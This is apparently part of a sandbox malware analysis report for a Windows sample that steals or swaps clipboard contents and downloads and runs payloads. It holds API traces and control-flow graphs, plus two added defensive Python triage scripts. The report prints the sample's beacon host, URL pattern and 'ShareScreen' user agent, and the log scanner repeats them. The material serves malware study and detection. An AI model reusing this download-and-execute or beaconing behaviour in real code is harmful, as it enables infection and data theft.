                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Internet$CloseFileHandle$OpenTemp$CreateExecuteNameObjectPathReadShellSingleWaitWrite
                                                                                                                                                                                                                                                                                      • String ID: .exe$<$ShareScreen
                                                                                                                                                                                                                                                                                      • API String ID: 3323492106-493228180
                                                                                                                                                                                                                                                                                      • Opcode ID: f58ca3bd5773c85defe3f015c49e34db42d2945e511aafa3139439615266b492
                                                                                                                                                                                                                                                                                      • Instruction ID: e60cee4ce2238679e1fb1751da2f8ba8583e6b9327599976f3985bfb1b161874
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f58ca3bd5773c85defe3f015c49e34db42d2945e511aafa3139439615266b492
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4741437190021CAFEB209F649D85FEAB7BCFF05745F0081F6A549E2190DEB49E858FA4
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00A3A006
                                                                                                                                                                                                                                                                                      • Module32First.KERNEL32(00000000,00000224), ref: 00A3A026
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3895623378.0000000000A39000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A39000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_a39000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3833638111-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                                                                      • Instruction ID: dccea5baf3c49d14a23887b3ca803f927808d4aa0a3ee91516fbd6d49097cd32
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B5F096362007206FD7243BF5988DBAFB6E8AF59725F100529F683D10C0DBB0EC458A61
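The three listings above (the clipboard routine at call sites 0x4016E6 to 0x401948, the download-and-execute routine at 0x402A17 to 0x402B95, and the Toolhelp32 module walk at 0x00A3A006 in the non-image region) are the per-function API traces an analyst reads for behaviour. What follows is an added example, not code from this report or from Joe Sandbox: a small Python triage script that parses listings in this page's own "• Api.MODULE(args), ref: ADDR" format, keeps "Part of subcall function" entries apart from a function's own calls, looks for ordered API chains within one function, and decodes the few arguments that change the reading (the InternetOpenW agent string, which WinINet sends as the HTTP User-Agent; the WaitForSingleObject timeout; the Toolhelp32 snapshot flags). SAMPLE is an abridged verbatim excerpt of the three listings; the chain definitions and behaviour labels are this example's own choices, not Joe Sandbox signature names.

```python
"""Behavioural triage of Joe Sandbox per-function API listings (added example, not
code from this report; SAMPLE is an abridged verbatim excerpt of the page's listings)."""
import re
from dataclasses import dataclass

# One "• Api.MODULE(args), ref: ADDR" line; "Part of subcall function" marks a callee.
API_LINE = re.compile(
    r"•\s*(?P<sub>Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>[A-Za-z_][\w@]*)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})"
)

# Ordered chains that must occur, in ascending call-site order, among a function's own
# calls. The labels are this example's wording, not Joe Sandbox signature names.
CHAINS = {
    "clipboard read-then-write (clipper loop)": ["OpenClipboard", "GetClipboardData",
        "EmptyClipboard", "SetClipboardData", "CloseClipboard", "Sleep"],
    "download to temp file and execute": ["InternetOpenUrlW", "CreateFileW",
        "WriteFile", "ShellExecuteExW"],
    "module enumeration via Toolhelp32": ["CreateToolhelp32Snapshot", "Module32First"],
}

@dataclass
class Call:
    api: str
    args: list      # raw argument tokens as printed by the report ('?' = unknown)
    ref: int        # call-site address
    subcall: bool   # listed under "Part of subcall function"

def parse_listings(text):
    """Split on 'APIs' headers; return one list of Call per function listing."""
    listings, cur = [], None
    for line in text.splitlines():
        s = line.strip()
        if s == "APIs":
            listings.append(cur := [])
        elif cur is not None and (m := API_LINE.match(s)):
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            cur.append(Call(m["api"], args, int(m["ref"], 16), m["sub"] is not None))
    return [calls for calls in listings if calls]

def has_chain(calls, chain):
    """True if `chain` is an ordered subsequence of the function's direct calls."""
    direct = sorted((c for c in calls if not c.subcall), key=lambda c: c.ref)
    i = 0
    for c in direct:
        if i < len(chain) and c.api == chain[i]:
            i += 1
    return i == len(chain)

def hexarg(call, n):
    try:
        return int(call.args[n], 16)
    except (IndexError, ValueError):    # missing, '?', or a string literal
        return None

def arg_notes(calls):
    """Decode the few argument values that change how a chain should be read."""
    notes = []
    for c in calls:
        if c.api == "InternetOpenW" and c.args:   # lpszAgent is sent as User-Agent
            notes.append(f"WinINet User-Agent is {c.args[0]!r}")
        elif c.api == "WaitForSingleObject" and hexarg(c, 1) is not None:
            notes.append(f"waits up to {hexarg(c, 1)} ms for the launched process")
        elif c.api == "CreateToolhelp32Snapshot" and (hexarg(c, 0) or 0) & 0x8:
            notes.append(f"TH32CS_SNAPMODULE snapshot of pid {hexarg(c, 1)} (0 = self)")
    return notes

def triage(text):
    """Return (first call-site address, behaviour label, notes) per matched chain."""
    out = []
    for calls in parse_listings(text):
        first = min(c.ref for c in calls if not c.subcall)
        for label, chain in CHAINS.items():
            if has_chain(calls, chain):
                out.append((first, label, arg_notes(calls)))
    return out

SAMPLE = """
APIs
  • Part of subcall function 0040CC10: _strlen.LIBCMT ref: 0040CC27
• OpenClipboard.USER32(00000000), ref: 0040171D
• GetClipboardData.USER32(00000001), ref: 0040172D
• EmptyClipboard.USER32 ref: 004018D2
• SetClipboardData.USER32(00000001,00000000), ref: 00401912
• CloseClipboard.USER32 ref: 0040193D
• Sleep.KERNEL32(000002D2), ref: 00401948
APIs
• InternetOpenW.WININET(ShareScreen,00000000,00000000,00000000,00000000), ref: 00402A17
• InternetOpenUrlW.WININET(00000000,0045D820,00000000,00000000,00000000,00000000), ref: 00402A2D
• CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00402A98
• WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00402AF1
• ShellExecuteExW.SHELL32(?), ref: 00402B68
• WaitForSingleObject.KERNEL32(?,00008000), ref: 00402B7D
APIs
• CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00A3A006
• Module32First.KERNEL32(00000000,00000224), ref: 00A3A026
"""

if __name__ == "__main__":
    for first, label, notes in triage(SAMPLE):
        print(f"0x{first:08X}: {label}" + "".join(f"; {n}" for n in notes))
```

Run stand-alone it prints one line per matched chain: the clipboard chain with no argument notes, the download chain with the 'ShareScreen' agent string (a hunting hook for proxy and IDS logs, since WinINet emits it as the User-Agent header) and the 32768 ms wait on the launched child, and the Toolhelp32 walk as a TH32CS_SNAPMODULE snapshot of the sample's own process. Ascending call-site address is only a proxy for control flow: it is enough to tell a read-then-write clipboard routine from a function that merely touches both APIs on unrelated paths, but a match should still be confirmed against the function's control-flow graph before it is written up as a behaviour.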

                                                                                                                                                                                                                                                                                      Control-flow Graph

[Control-flow graph of the function at 0x43D03C (Joe Sandbox IDA plugin; executed and not-executed basic blocks are colour-coded in the original, edge list not reproduced). The graph shows CreateFileW reached through the helper at 0x43CD0A, followed by GetFileType and CloseHandle, with GetLastError results passed through __dosmaperr on each failure path; an error-mapping pattern characteristic of C runtime library file-open code rather than of the sample's own logic.]
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 0043CD0A: CreateFileW.KERNEL32(00000000,00000000,?,0043D0E5,?,?,00000000,?,0043D0E5,00000000,0000000C), ref: 0043CD27
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0043D150
                                                                                                                                                                                                                                                                                      • __dosmaperr.LIBCMT ref: 0043D157
                                                                                                                                                                                                                                                                                      • GetFileType.KERNEL32(00000000), ref: 0043D163
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0043D16D
                                                                                                                                                                                                                                                                                      • __dosmaperr.LIBCMT ref: 0043D176
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0043D196
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 0043D2E0
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0043D312
                                                                                                                                                                                                                                                                                      • __dosmaperr.LIBCMT ref: 0043D319
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                                                                                                                                                                      • String ID: H
                                                                                                                                                                                                                                                                                      • API String ID: 4237864984-2852464175
                                                                                                                                                                                                                                                                                      • Opcode ID: 333ff1eee16b6be64793bd318ad3fa05ede6171504cd334b681c7e0d8fb5623c
                                                                                                                                                                                                                                                                                      • Instruction ID: 375b4e16163f674ce9da34a4ad13212d62ba31a6b33a52f993f1a67b08af40b6
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 333ff1eee16b6be64793bd318ad3fa05ede6171504cd334b681c7e0d8fb5623c
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: ACA13632E101149FCF19AF68EC517AE7BA1AF0A324F14115EF8159B391D6389D02CB5A

Control-flow Graph

control_flow_graph 142 432f29-432f39 143 432f53-432f55 142->143 144 432f3b-432f4e call 42eab6 call 42eac9 142->144 146 432f5b-432f61 143->146 147 4332bd-4332ca call 42eab6 call 42eac9 143->147 161 4332d5 144->161 146->147 150 432f67-432f92 146->150 166 4332d0 call 42a59d 147->166 150->147 153 432f98-432fa1 150->153 156 432fa3-432fb6 call 42eab6 call 42eac9 153->156 157 432fbb-432fbd 153->157 156->166 159 432fc3-432fc7 157->159 160 4332b9-4332bb 157->160 159->160 165 432fcd-432fd1 159->165 163 4332d8-4332dd 160->163 161->163 165->156 168 432fd3-432fea 165->168 166->161 171 433007-433010 168->171 172 432fec-432fef 168->172 175 433012-433029 call 42eab6 call 42eac9 call 42a59d 171->175 176 43302e-433038 171->176 173 432ff1-432ff7 172->173 174 432ff9-433002 172->174 173->174 173->175 179 4330a3-4330bd 174->179 206 4331f0 175->206 177 43303a-43303c 176->177 178 43303f-43305d call 4336a7 call 43346a * 2 176->178 177->178 215 43307a-4330a0 call 4347ee 178->215 216 43305f-433075 call 42eac9 call 42eab6 178->216 181 4330c3-4330d3 179->181 182 433191-43319a call 43d365 179->182 181->182 185 4330d9-4330db 181->185 193 43320d 182->193 194 43319c-4331ae 182->194 185->182 191 4330e1-433107 185->191 191->182 196 43310d-433120 191->196 202 433211-433229 ReadFile 193->202 194->193 198 4331b0-4331bf GetConsoleMode 194->198 196->182 200 433122-433124 196->200 198->193 205 4331c1-4331c5 198->205 200->182 207 433126-433151 200->207 203 433285-433290 GetLastError 202->203 204 43322b-433231 202->204 209 433292-4332a4 call 42eac9 call 42eab6 203->209 210 4332a9-4332ac 203->210 204->203 211 433233 204->211 205->202 212 4331c7-4331e1 ReadConsoleW 205->212 213 4331f3-4331fd call 43346a 206->213 207->182 214 433153-433166 207->214 209->206 222 4332b2-4332b4 210->222 223 4331e9-4331ef call 42ea93 210->223 218 433236-433248 211->218 220 4331e3 GetLastError 212->220 221 433202-43320b 212->221 213->163 214->182 225 433168-43316a 214->225 215->179 216->206 218->213 228 43324a-43324e 218->228 220->223 221->218 222->213 223->206 225->182 232 43316c-43318c 225->232 235 433250-433260 call 432c45 228->235 236 433267-433272 228->236 232->182 247 433263-433265 235->247 242 433274 call 432d95 236->242 243 43327e-433283 call 432a85 236->243 248 433279-43327c 242->248 243->248 247->213 248->247
Memory Dump Source
• Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: bf5b903c5d4d7d43f3395e6d2b0615cff82c67b54ffa341e922cfa30cc62cd86
• Instruction ID: e6f917e7e92ba8bfc6e6230e9bcbcb6957f35208d34794f9861c257e27c575d5
• Opcode Fuzzy Hash: bf5b903c5d4d7d43f3395e6d2b0615cff82c67b54ffa341e922cfa30cc62cd86
• Instruction Fuzzy Hash: 44C11670E04345AFDF11DFAAD841BAEBBB0BF0D305F14119AE815A7392C7389A41CB69

Control-flow Graph

control_flow_graph 250 24c003c-24c0047 251 24c004c-24c0263 call 24c0a3f call 24c0e0f call 24c0d90 VirtualAlloc 250->251 252 24c0049 250->252 267 24c028b-24c0292 251->267 268 24c0265-24c0289 call 24c0a69 251->268 252->251 270 24c02a1-24c02b0 267->270 272 24c02ce-24c03c2 VirtualProtect call 24c0cce call 24c0ce7 268->272 270->272 273 24c02b2-24c02cc 270->273 279 24c03d1-24c03e0 272->279 273->270 280 24c0439-24c04b8 VirtualFree 279->280 281 24c03e2-24c0437 call 24c0ce7 279->281 283 24c04be-24c04cd 280->283 284 24c05f4-24c05fe 280->284 281->279 286 24c04d3-24c04dd 283->286 287 24c077f-24c0789 284->287 288 24c0604-24c060d 284->288 286->284 292 24c04e3-24c0505 LoadLibraryA 286->292 290 24c078b-24c07a3 287->290 291 24c07a6-24c07b0 287->291 288->287 293 24c0613-24c0637 288->293 294 24c086e-24c08be LoadLibraryA 291->294 295 24c07b6-24c07cb 291->295 296 24c0517-24c0520 292->296 297 24c0507-24c0515 292->297 298 24c063e-24c0648 293->298 302 24c08c7-24c08f9 294->302 299 24c07d2-24c07d5 295->299 300 24c0526-24c0547 296->300 297->300 301 24c064e-24c065a 298->301 303 24c0824-24c0833 299->303 304 24c07d7-24c07e0 299->304 305 24c054d-24c0550 300->305 301->287 306 24c0660-24c066a 301->306 307 24c08fb-24c0901 302->307 308 24c0902-24c091d 302->308 314 24c0839-24c083c 303->314 309 24c07e4-24c0822 304->309 310 24c07e2 304->310 311 24c0556-24c056b 305->311 312 24c05e0-24c05ef 305->312 313 24c067a-24c0689 306->313 307->308 309->299 310->303 315 24c056d 311->315 316 24c056f-24c057a 311->316 317 24c068f-24c06b2 313->317 318 24c0750-24c077a 313->318 314->294 319 24c083e-24c0847 314->319 315->312 321 24c057c-24c0599 316->321 322 24c059b-24c05bb 316->322 323 24c06ef-24c06fc 317->323 324 24c06b4-24c06ed 317->324 318->298 325 24c0849 319->325 326 24c084b-24c086c 319->326 333 24c05bd-24c05db 321->333 322->333 327 24c06fe-24c0748 323->327 328 24c074b 323->328 324->323 325->294 326->314 327->328 328->313 333->305
APIs
• VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 024C024D
Strings
Memory Dump Source
• Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
Yara matches
Similarity
• API ID: AllocVirtual
• String ID: cess$kernel32.dll
• API String ID: 4275171209-1230238691
• Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
• Instruction ID: fc6d8bf3b30f58ecec1e8ce670d687e404b49ad6cec5627aabf533009412aab4
• Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
• Instruction Fuzzy Hash: 0D526C74A01229DFDBA4CF58C984BADBBB1BF09304F1480DAE54DAB351DB30AA95CF14

Control-flow Graph

APIs
• InternetOpenW.WININET(ShareScreen,00000000,00000000,00000000,00000000), ref: 00402C27
  • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010C1
  • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010DD
• InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00402E3A
• InternetCloseHandle.WININET(00000000), ref: 00402E4B
• InternetCloseHandle.WININET(00000000), ref: 00402E4E
Strings
Memory Dump Source
• Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
Similarity
• API ID: Internet$CloseHandleOpen_wcslen
• String ID: &cc=DE$ShareScreen$https://post-to-me.com/track_prt.php?sub=
• API String ID: 3067768807-1501832161
• Opcode ID: 89be1508a3bc8005e5e9602c7d60be0ea7129d63634688ee67e7a2662fb1427b
• Instruction ID: 610146e9b537463af15e95cb977131b409bd75c1d6f6ac837d2bfbf99fd09ca4
• Opcode Fuzzy Hash: 89be1508a3bc8005e5e9602c7d60be0ea7129d63634688ee67e7a2662fb1427b
• Instruction Fuzzy Hash: 95515295E65344A9E320EFB0BC46B762378EF58712F10643BE518CB2F2E7B09944875E
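The function above (InternetOpenW at 0x402C27, InternetOpenUrlW at 0x402E3A) is the one place in this dump where the sample's own network indicators are visible: the WinINet user agent "ShareScreen" and the URL fragments "https://post-to-me.com/track_prt.php?sub=" and "&cc=DE". The following is an added triage example, not Joe Sandbox output and not code from the sample. It turns those strings into a scanner over proxy log lines and ranks hits by how specific they are to this sample. Assumptions, labelled in the code: the two fragments are joined as prefix + <sub value> + "&cc=DE" (the report shows the fragments, not the final string), the log line layout, and the sample log lines, which are constructed for the example.

```python
"""Triage check for the WinINet beacon in the function at 0x402C27.

Added example, not Joe Sandbox output and not code from the sample. Indicators
taken from the report: InternetOpenW is called with the user agent
"ShareScreen", and InternetOpenUrlW with a URL assembled from the fragments
"https://post-to-me.com/track_prt.php?sub=" and "&cc=DE". ASSUMPTIONS: the
fragments are joined as prefix + <sub value> + "&cc=DE", the proxy log format
below, and the sample log lines (constructed for this example).
"""
import re
from urllib.parse import parse_qs, urlsplit

BEACON_USER_AGENT = "ShareScreen"   # InternetOpenW lpszAgent argument
BEACON_HOST = "post-to-me.com"      # host part of the URL fragment
BEACON_PATH = "/track_prt.php"      # path part of the URL fragment

# Assumed proxy log layout: <timestamp> <client-ip> <method> <url> "<user-agent>"
LOG_RE = re.compile(
    r'^(?P<ts>\S+) (?P<src>\S+) (?P<method>[A-Z]+) (?P<url>\S+) "(?P<ua>[^"]*)"$'
)

# Constructed sample lines: one full beacon, one benign request, one lookalike
# path on another host, and one benign URL sent with the rare user agent only.
SAMPLE_LOG = """\
2024-12-16T10:01:02Z 10.0.0.17 GET https://post-to-me.com/track_prt.php?sub=abc123&cc=DE "ShareScreen"
2024-12-16T10:01:05Z 10.0.0.17 GET https://www.microsoft.com/ "Mozilla/5.0"
2024-12-16T10:02:11Z 10.0.0.23 GET https://example.net/track_prt.php?sub=x&cc=DE "Mozilla/5.0"
2024-12-16T10:03:40Z 10.0.0.23 POST https://cdn.example.com/u "ShareScreen"
"""


def build_beacon_url(sub: str, cc: str = "DE") -> str:
    """Reconstruct the request URL under the assumed concatenation order."""
    return f"https://{BEACON_HOST}{BEACON_PATH}?sub={sub}&cc={cc}"


def classify(url: str, user_agent: str) -> list[str]:
    """Return the beacon indicators (in a fixed order) that match one request."""
    hits = []
    parts = urlsplit(url)
    if (parts.hostname or "").lower() == BEACON_HOST:
        hits.append("host")
    if parts.path == BEACON_PATH:
        hits.append("path")
    query = parse_qs(parts.query)
    if "sub" in query and query.get("cc") == ["DE"]:
        hits.append("query")
    if user_agent == BEACON_USER_AGENT:
        hits.append("user-agent")
    return hits


def severity(hits: list[str]) -> str:
    """Host or user-agent match is specific to this sample; path/query alone is weak."""
    return "high" if {"host", "user-agent"} & set(hits) else "low"


def scan_log(text: str) -> list[dict]:
    """Parse log lines and return one alert per line with at least one indicator."""
    alerts = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line: skipped, never alerted on
        hits = classify(m["url"], m["ua"])
        if hits:
            alerts.append({"src": m["src"], "url": m["url"],
                           "hits": hits, "severity": severity(hits)})
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert["severity"], alert["src"], alert["url"], ",".join(alert["hits"]))
```

Run as a script it prints three alerts from the constructed log: the full beacon and the bare "ShareScreen" request rank high, the lookalike path on another host ranks low. The generic "track_prt.php" path and "cc=DE" query are kept as weak indicators only, since a filename and a two-letter parameter recur across unrelated sites; the user agent and the host are the values worth pivoting on in proxy or DNS telemetry.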

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
Similarity
• API ID: Cnd_initstd::_$Cnd_waitMtx_initThrd_start
• String ID:
• API String ID: 1687354797-0
• Opcode ID: a291ca2b74a2a079234bae36187643b4709f220aeabf3b9fcc979ead6e8bbad4
• Instruction ID: 19e1887bebf86d68050debe7f629b0077f83fb22891cd3fd40adaf63da529dec
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a291ca2b74a2a079234bae36187643b4709f220aeabf3b9fcc979ead6e8bbad4
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A2214F72C042089ADF15EBE9D845BDEB7F8AF08318F14407FE544B72C2DB7C99448AA9

Control-flow Graph
APIs
• std::_Cnd_initX.LIBCPMT ref: 0040581C
• __Cnd_signal.LIBCPMT ref: 00405828
• std::_Cnd_initX.LIBCPMT ref: 0040583D
• __Cnd_do_broadcast_at_thread_exit.LIBCPMT ref: 00405844
Memory Dump Source
• Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
Similarity
• API ID: Cnd_initstd::_$Cnd_do_broadcast_at_thread_exitCnd_signal
• String ID:
• API String ID: 2059591211-0
• Opcode ID: 75d2ec5a84d6058dd22c20c78519f5ebb85b54958e4003f0e2117dcdaee44c85
• Instruction ID: 35483bd65d518524af9bc0c336ffe1903f30c86e9e3fc9c48514fd729a934722
• Opcode Fuzzy Hash: 75d2ec5a84d6058dd22c20c78519f5ebb85b54958e4003f0e2117dcdaee44c85
• Instruction Fuzzy Hash: 6BF082324007009BE7317762C807B1A77A0AF0031DF10883FF496B69E2CFBDA8544A9D

Control-flow Graph
APIs
• GetLastError.KERNEL32(00457910,00000010,00000003,00431F5D), ref: 0042DFD3
• ExitThread.KERNEL32 ref: 0042DFDA
Memory Dump Source
• Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
Similarity
• API ID: ErrorExitLastThread
• String ID: F(@
• API String ID: 1611280651-2698495834
• Opcode ID: 05a6bf9322938420f326034e00ba90610ba59fb7b5f4eb19846d64da3dd64c95
• Instruction ID: 20c869b795d3320417ca4c19bdea27327a86df913c4cc91a2df8cdb03a1abfe5
• Opcode Fuzzy Hash: 05a6bf9322938420f326034e00ba90610ba59fb7b5f4eb19846d64da3dd64c95
• Instruction Fuzzy Hash: E7F0C274A00614AFDB14AFB2E80ABAE3B70FF09715F10056EF4015B392CB796A55DB6C

Control-flow Graph
control_flow_graph 435 42e114-42e11f 436 42e121-42e133 call 42eac9 call 42a59d 435->436 437 42e135-42e148 call 42e0cb 435->437 452 42e185-42e188 436->452 443 42e176 437->443 444 42e14a-42e167 CreateThread 437->444 445 42e178-42e184 call 42e03d 443->445 447 42e189-42e18e 444->447 448 42e169-42e175 GetLastError call 42ea93 444->448 445->452 450 42e190-42e193 447->450 451 42e195-42e197 447->451 448->443 450->451 451->445
APIs
• CreateThread.KERNEL32(?,?,Function_0002DFC0,00000000,?,?), ref: 0042E15D
• GetLastError.KERNEL32(?,?,?,?,?,0040CF0E,00000000,00000000,?,?,00000000,?), ref: 0042E169
• __dosmaperr.LIBCMT ref: 0042E170
Memory Dump Source
• Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
Similarity
• API ID: CreateErrorLastThread__dosmaperr
• String ID:
• API String ID: 2744730728-0
• Opcode ID: 2b840c7f841b7cccdda56e05bcd555d2476c4531c994d68046d65894b3d724d0
• Instruction ID: dd8ab9647f30f5a835e394039e4629bb1c045fd9997365d20d72d2d3bd3a9304
• Opcode Fuzzy Hash: 2b840c7f841b7cccdda56e05bcd555d2476c4531c994d68046d65894b3d724d0
• Instruction Fuzzy Hash: D601D236200239BBDB159FA3EC059AF7B6AEF81720F40003AF90587210DB358922C7A8

Control-flow Graph
control_flow_graph 456 434755-43476d call 439921 459 434780-434796 SetFilePointerEx 456->459 460 43476f-434774 call 42eac9 456->460 462 4347a7-4347b1 459->462 463 434798-4347a5 GetLastError call 42ea93 459->463 466 43477a-43477e 460->466 465 4347b3-4347c8 462->465 462->466 463->466 469 4347cd-4347d2 465->469 466->469
APIs
• SetFilePointerEx.KERNEL32(00000000,00000000,0040DDD5,00000000,00000002,0040DDD5,00000000,?,?,?,00434804,00000000,00000000,0040DDD5,00000002), ref: 0043478E
• GetLastError.KERNEL32(?,00434804,00000000,00000000,0040DDD5,00000002,?,0042C161,?,00000000,00000000,00000001,?,0040DDD5,?,0042C216), ref: 00434798
• __dosmaperr.LIBCMT ref: 0043479F
Memory Dump Source
• Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
Similarity
• API ID: ErrorFileLastPointer__dosmaperr
• String ID:
• API String ID: 2336955059-0
• Opcode ID: 0f8939188b6fdc8a7da50d1b405e1129083f9e2b96a50d0a3cd5949e7845d65d
• Instruction ID: bcc915797d3e420762720933ca2114d92cc1cd6946a03aaf12616f5971efc3d8
• Opcode Fuzzy Hash: 0f8939188b6fdc8a7da50d1b405e1129083f9e2b96a50d0a3cd5949e7845d65d
• Instruction Fuzzy Hash: 01016836710114ABCB148FAADC059EE7B29EFCA730F24020AF81487290EB35ED118B98

Control-flow Graph
control_flow_graph 470 402bad-402bd9 RegCreateKeyExW 471 402bdb-402bed RegSetValueExW 470->471 472 402bef-402bf2 470->472 471->472 473 402bf4-402bf7 RegCloseKey 472->473 474 402bfd-402c03 472->474 473->474
APIs
• RegCreateKeyExW.KERNEL32(80000001,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BCF
• RegSetValueExW.KERNEL32(?,?,00000000,00000001,?,00000004,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BE7
• RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BF7
Memory Dump Source
• Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
Similarity
• API ID: CloseCreateValue
• String ID:
• API String ID: 1818849710-0
• Opcode ID: 17a0f39c5dea863e0681c067e94205fb1cf9212befe975e377a74504568b03c9
• Instruction ID: 415a99b38b1cf926e07f2752f011508d1a06d6109c2dcef31e57e84081a4d25d
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 17a0f39c5dea863e0681c067e94205fb1cf9212befe975e377a74504568b03c9
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: ABF0B4B650011CFFEB214F94DD89DBBBA7CEB007E9F100175FA01B2150D6B19E009664

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      control_flow_graph 475 42e074-42e081 call 431f5e 478 42e083-42e086 ExitThread 475->478 479 42e08c-42e094 475->479 479->478 480 42e096-42e09a 479->480 481 42e0a1-42e0a7 480->481 482 42e09c call 4354f6 480->482 484 42e0b4-42e0ba 481->484 485 42e0a9-42e0ab 481->485 482->481 484->478 487 42e0bc-42e0be 484->487 485->484 486 42e0ad-42e0ae CloseHandle 485->486 486->484 487->478 488 42e0c0-42e0ca FreeLibraryAndExitThread 487->488
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 00431F5E: GetLastError.KERNEL32(?,?,?,0042EACE,00434D7C,?,00431F08,00000001,00000364,?,0042DFE5,00457910,00000010), ref: 00431F63
